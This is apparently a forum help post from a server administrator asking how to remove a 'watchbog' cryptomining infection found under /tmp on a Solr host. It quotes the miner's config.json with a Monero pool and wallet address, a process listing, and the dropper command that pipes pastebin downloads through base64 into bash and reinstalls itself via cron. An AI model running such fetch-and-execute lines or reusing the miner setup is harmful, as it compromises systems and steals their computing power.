I have found this question below but I need some more clarification that's why I am writing again.
I have a process called “watchbog” that is completely hogging my CPU and I don't know what it is
So I did some digging, and found that an executable is being run from the /tmp
directory. The folder structure is something like this:
/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data
In that folder there are two files, one executable watchbog
which is actually being run and one config.json
. This is the content of the config file,
{
"algo": "cryptonight",
"api": {
"port": 0,
"access-token": null,
"id": null,
"worker-id": null,
"ipv6": false,
"restricted": true
},
"asm": true,
"autosave": true,
"av": 0,
"background": true,
"colors": true,
"cpu-affinity": null,
"cpu-priority": 3,
"donate-level": 1,
"huge-pages": false,
"hw-aes": null,
"log-file": null,
"max-cpu-usage": 100,
"pools": [
{
"url": "pool.minexmr.com:443",
"user": "4AbjKdQkedGZXvzm6VxMJb1zLB2CAmCmXdoCisRsQFAUPs4TWFePDUcZzk5ui4EdZXT3uaXXtssqPCoKQPTz7PeZNkKASkm.old",
"pass": "x",
"rig-id": null,
"nicehash": false,
"keepalive": true,
"variant": -1,
"tls": false,
"tls-fingerprint": null
}
],
"print-time": 60,
"retries": 5,
"retry-pause": 5,
"safe": false,
"threads": [
{
"low_power_mode": 1,
"affine_to_cpu": false,
"asm": true
},
{
"low_power_mode": 1,
"affine_to_cpu": false,
"asm": true
}
],
"user-agent": null,
"syslog": false,
"watch": false
}
But deleting the folders is not helping, they are being recreated withing few seconds. So I tried to see what other process are running and I found these
solr 32616 0.0 0.0 4504 780 ? Ss 13:10 0:00 /bin/sh -c (curl -fsSL https://pastebin.com/raw/aGTSGJJp||wget -q -O- h
solr 32618 0.0 0.0 11224 2924 ? S 13:10 0:00 bash
solr 32623 0.2 0.0 11644 3376 ? S 13:10 0:00 /bin/bash
solr 32656 200 0.1 270204 6996 ? Ssl 13:10 0:26 ./watchbog
The pastebin url points to another shell command with another shell command with another pastebin url.
(curl -fsSL https://pastebin.com/raw/nMrfmnRa||wget -q -O- https://pastebin.com/raw/nMrfmnRa) | base64 -d | /bin/bash
This second pastebin url points to a base64 encoded shell script. I can't include it here due to character limitation. Here is the link: https://pastebin.com/raw/nMrfmnRa
I am no expert in this field, but it looks like the script is setting a cron job which downloads the executable again.
This is all I could find on my own, can anyone please guide as to how I can stop this whole thing or would I have to redeploy the server again?